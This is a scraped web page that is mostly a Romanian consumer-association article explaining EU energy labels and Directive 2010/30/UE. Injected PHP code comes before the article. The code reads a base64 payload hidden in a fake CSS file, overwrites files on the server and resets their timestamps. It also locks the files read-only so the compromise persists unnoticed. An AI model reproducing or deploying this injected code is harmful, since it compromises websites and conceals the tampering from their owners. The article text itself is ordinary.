$wp_update_file="/home/shuffles/public_html/wp-includes/css/wp-timer.css"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Eticheta energetica – O noua atitudine

o9atitudine-Protectia-Consumatorilor-_Protectia-ConsumatoruluiEtichetele energetice arată unde se situează un aparat pe o scară de la A la G, în funcție de consumul său de energie. Clasa A (verde) este cea mai eficientă din punct de vedere energetic și clasa G (roșu), cel mai puțin eficientă. Când majoritatea aparatelor de un anumit tip ajung la clasa A, mai pot fi adăugate cel mult 3 alte clase : A+, A++ și A+++.

Care sunt avantajele?

Etichetele energetice le permit consumatorilor să aleagă produse care consumă mai puțină energie și, astfel, pot face economii. Etichetele pot, de asemenea, să încurajeze întreprinderile să creeze și să investească în proiectarea eficientă din punct de vedere energetic a produselor.

Ce produse necesită etichete?

Etichetele energetice sunt obligatorii pentru toate echipamentele vândute în UE pentru care există o etichetă. Acestea trebuie afișate în mod vizibil pe fiecare aparat.

De exemplu, dacă fabricaţi sau importaţi aparate de uz casnic (uscător de rufe, mașini de spălat și aparate de climatizare, mașini de spălat vase, mașini de spălat rufe, frigidere, televizoarele etc.), verificaţi dacă acestea respectă prevederile Directivei 2010/30/UE privind etichetarea și informațiile despre produs referitoare la consumul de energie și legislația conexă (a se vedea rubrica „Ce trebuie să fac?”).

Directiva se aplică aparatelor și oricăror alte produse care ar putea avea un impact direct sau indirect asupra consumului de energie și alte resurse potențiale în timpul utilizării, și anume produsele cu impact energetic. Nu se aplică produselor second-hand sau vehiculelor utilizate pentru transportul de persoane sau bunuri.

Ce trebuie să fac?

Toate aparatele pe care le comercializaţi, pentru care există o etichetă, trebuie să aibă o astfel de etichetă cu informații referitoare la cantitatea de energie pe care o utilizează. De asemenea, trebuie să publicaţi şi documentaţia tehnică (a se vedea rubrica „Ce sunt regulamentele delegate?”).

Etichetele și informațiile despre produs trebuie să puse gratuit la dispoziția distribuitorilor. Dacă sunteți comerciant, trebuie să afişaţi etichetele în aşa fel încât să fie vizibile și lizibile.

Ce se întâmplă în cazul în care vând produsele pe internet, pe bază de catalog etc.?

Dacă faceţi vânzare la distanță, de exemplu prin internet, trebuie să găsiţi o modalitate prin care clienții dumneavoastră să aibă acces la informațiile privind produsul, aşa cum se prevede în directivă și în legislația conexă.

Ce sunt regulamentele delegate?

Regulamentele delegate privind etichetarea aparatelor de uz casnic enunţă criteriile pe care produsul dumneavoastră trebuie să le respecte pentru a se conforma directivei privind etichetarea energetică. De exemplu:

  • ce informații trebuie să puneți la dispoziție
  • cum trebuie etichetat produsul dumneavoastră în funcţie de nivelul de consum energetic
  • ce etichete trebuie aplicate pe produs.

Pe pagina de internet veți găsi, de asemenea, mai multe modele foarte utile, pe care le puteți folosi pentru a tipări etichetele energetice.

Uneori industria ia inițiativa de a defini acorduri voluntare pentru un anumit grup de produse. Aceste acorduri pot contribui la îndeplinirea mai rapidă şi mai rentabilă a obiectivelor strategice decât cerințele obligatorii.

De asemenea, ar trebui să verificaţi dacă pentru produsul dumneavoastră există standarde europene în materie de proiectare ecologică și etichetarea energetică. Standardele vă vor ajuta să îndepliniţi cerinţele prevăzute de directivă.

Sursa: www.europe.eu

Asociaţia Naţională pentru Protecţia Consumatorilor şi Promovarea Programelor şi Strategiilor din Romania – A.N.P.C.P.P.S.Romania – InfoCons ( www.protectia-consumatorilor.ro), unica organizaţie din România cu drepturi depline în Consumers International, este o asociaţie de consumatori neguvernamentală, reprezentativă, de drept privat, fără scop lucrativ, cu patrimoniu distinct şi indivizibil, independentă, întemeiată pe principii democratice, ce apără drepturile consumatorilor – membră fondatoare a Federaţiei Asociaţiilor de Consumatori.

By o9admin